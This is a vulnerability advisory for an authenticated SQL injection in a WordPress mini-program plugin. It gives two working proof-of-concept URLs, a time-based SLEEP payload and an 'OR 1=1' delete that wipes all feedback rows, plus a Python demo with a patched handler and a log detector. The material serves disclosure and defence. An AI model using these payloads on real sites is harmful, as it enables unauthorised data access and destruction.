Source: wpexploit
WPEX-ID: CBD65B7D-D3C3-4EE3-8E5E-FF0EEEAA7B30
Published: Jul 30, 2021

JiangQie Official Website Mini Program < 1.1.1 - Authenticated SQL Injection


EPSS: 0.001 (Low), percentile 50.1%

The plugin does not escape or validate the id GET parameter of its jiangqie_ow_free_feedback admin page (admin.php?page=jiangqie_ow_free_feedback) before concatenating it into SQL statements, leading to SQL injection. The page is only reachable by an authenticated user, hence the "authenticated" classification.

Proof of concept (time-based blind injection in the detail action; the response is delayed by roughly five seconds when the injected SLEEP(5) is evaluated):

https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29

The same unescaped id parameter reaches the delete action, so id=1 OR 1=1 turns the delete query into one that matches every row. A logged-in admin who opens the following link deletes all feedback records:

https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1
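The following is an added example written for this page; it is not the plugin's code. It reproduces the bug class behind the delete PoC above against an in-memory SQLite table (standing in for the plugin's MySQL table; the table and column names are assumed), shows the hardened handler a plugin author would write (validate the id as a positive integer, then bind it as a parameter, the equivalent of WordPress's absint() plus $wpdb->prepare('%d')), and includes a small log-triage check that flags both PoC URLs. SQLite has no SLEEP(), so the time-based payload is only parsed, not executed.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# Assumed table name for illustration; the advisory does not name the table.
FEEDBACK_TABLE = "wp_jiangqie_feedback"

# The two PoC URLs from the advisory.
SLEEP_POC = ("https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback"
             "&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29")
DELETE_POC = ("https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback"
              "&action=delete&id=1+OR+1%3D1")


def fresh_db():
    """Constructed sample data: three feedback rows in an in-memory table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {FEEDBACK_TABLE} (id INTEGER PRIMARY KEY, content TEXT)")
    conn.executemany(
        f"INSERT INTO {FEEDBACK_TABLE} (id, content) VALUES (?, ?)",
        [(1, "first"), (2, "second"), (3, "third")],
    )
    conn.commit()
    return conn


def id_from_url(url):
    """Return the URL-decoded `id` GET parameter, as PHP's $_GET['id'] would see it
    ('+' becomes a space, %28 becomes '(')."""
    return parse_qs(urlparse(url).query).get("id", [""])[0]


def delete_vulnerable(conn, raw_id):
    """The pattern the advisory describes: untrusted input concatenated into SQL.
    Returns the number of rows deleted."""
    cur = conn.execute(f"DELETE FROM {FEEDBACK_TABLE} WHERE id = {raw_id}")
    conn.commit()
    return cur.rowcount


def delete_fixed(conn, raw_id):
    """Hardened handler: accept only a decimal integer, then bind it as a
    parameter so the value can never change the query's structure.
    Raises ValueError for anything that is not an id."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError(f"invalid id: {raw_id!r}")
    cur = conn.execute(f"DELETE FROM {FEEDBACK_TABLE} WHERE id = ?", (int(raw_id),))
    conn.commit()
    return cur.rowcount


def remaining(conn):
    return conn.execute(f"SELECT COUNT(*) FROM {FEEDBACK_TABLE}").fetchone()[0]


def suspicious_request(url):
    """Log-triage check: a jiangqie_ow_free_feedback request whose `id` is
    present but not a plain integer is an injection attempt."""
    qs = parse_qs(urlparse(url).query)
    if qs.get("page", [""])[0] != "jiangqie_ow_free_feedback":
        return False
    raw = qs.get("id", [""])[0]
    return raw != "" and not raw.isdigit()


def run_demo():
    """Run both handlers against the delete PoC payload; return the outcomes."""
    payload = id_from_url(DELETE_POC)            # "1 OR 1=1"
    vuln = fresh_db()
    deleted_vuln = delete_vulnerable(vuln, payload)
    fixed = fresh_db()
    try:
        delete_fixed(fixed, payload)
        rejected = False
    except ValueError:
        rejected = True
    deleted_ok = delete_fixed(fixed, "2")       # legitimate request still works
    return {
        "payload": payload,
        "vulnerable_deleted": deleted_vuln,     # 3: every row is gone
        "vulnerable_left": remaining(vuln),     # 0
        "fixed_rejected_payload": rejected,     # True
        "fixed_deleted_valid": deleted_ok,      # 1
        "fixed_left": remaining(fixed),         # 2
    }


if __name__ == "__main__":
    print(run_demo())
    print("sleep PoC flagged:", suspicious_request(SLEEP_POC))
    print("delete PoC flagged:", suspicious_request(DELETE_POC))
```

The integer check is the important part of the fix: escaping alone would not help here because the value is used in a numeric context with no surrounding quotes, so the injected OR 1=1 never has to break out of a string.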

